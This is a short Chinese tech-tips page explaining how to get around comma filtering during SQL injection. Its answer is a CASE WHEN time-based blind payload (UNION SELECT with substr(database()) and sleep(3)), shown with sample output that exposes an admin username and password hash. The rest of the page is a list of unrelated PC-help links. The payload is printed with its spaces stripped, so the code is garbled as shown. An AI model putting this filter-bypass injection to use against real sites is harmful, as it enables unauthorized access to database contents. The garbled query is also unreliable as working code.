sql注入过滤逗号怎么办
sql注入过滤逗号的解决方法:
通过case when then绕过,例如:
mysql>select*fromlbcms_adminwhereadminnamelike"%a%"unionselect1,2,3,4,5,6,7,casewhensubstr(database()from1for1)='l'thensleep(3)else0end;+----+-----------+-----------------+----------+-------------+------------+-----------+---------------------+
|ID|adminName|adminPassWord|adminLov|adminConfig|adminClass|adminLock|adminDate|
+----+-----------+-----------------+----------+-------------+------------+-----------+---------------------+
|1|admin|a797ba2993304483f0d180e25d14319a|520||NULL|SgrRUQ|2010-04-1400:00:00|
|1|2|3|4|5|6|7|0|
+----+-----------+-----------------+----------+-------------+------------+-----------+---------------------+
2 rows in set (3.00 sec)
上一篇:vmvare如何配置域名解析
下一篇:mysql怎么修改配置文件路径
sql注入
声卡驱动正常但是没有声音如何办?声卡驱动正常没声音的解决方法
英伟达显卡驱动如何退回到原来版本?英伟达显卡驱动退回到原来版
重装系统,电脑只有一个C盘如何创建分区
Defender提示错误应用程序MsMpEng.exe无法启动
电脑无法启动或仍在加载如何办?电脑无法启动或仍在加载的解决方
打印机驱动如何卸载删除?卸载打印机驱动干净的教程
电脑没网如何安装网卡驱动?教你没网如何安装网卡驱动的方法
系统32位和62位如何选择:详解它们之间的差异
电脑文件删不掉如何办?四种方法解决
任务管理器快捷键有哪些?任务管理器快捷键大全